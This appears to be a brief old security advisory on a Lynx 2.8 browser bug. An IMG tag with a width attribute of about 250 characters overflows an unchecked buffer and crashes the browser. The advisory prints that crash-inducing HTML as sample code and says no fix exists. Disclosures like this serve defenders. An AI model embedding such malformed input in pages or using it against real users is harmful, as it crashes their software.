COMMAND

    lynx

SYSTEMS AFFECTED

    Systems running lynx 2.8

PROBLEM

    Mixter  posted  following.   This  was  tested  with  Lynx Version
    2.8.1pre.9.  An IMG tag with a width of about 250 chars  instantly
    crashes  this  version  (and  probably  others).   This bug is not
    limited  to  lynx,  it  was  first  discovered with MSIE 4/5.  The
    overflow is due  to a limited  and non-checked buffer  in function
    strrchr() ...  Here is some sample code:

        <img width=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001>
        FAILED<br><br>

SOLUTION

    Nothing yet.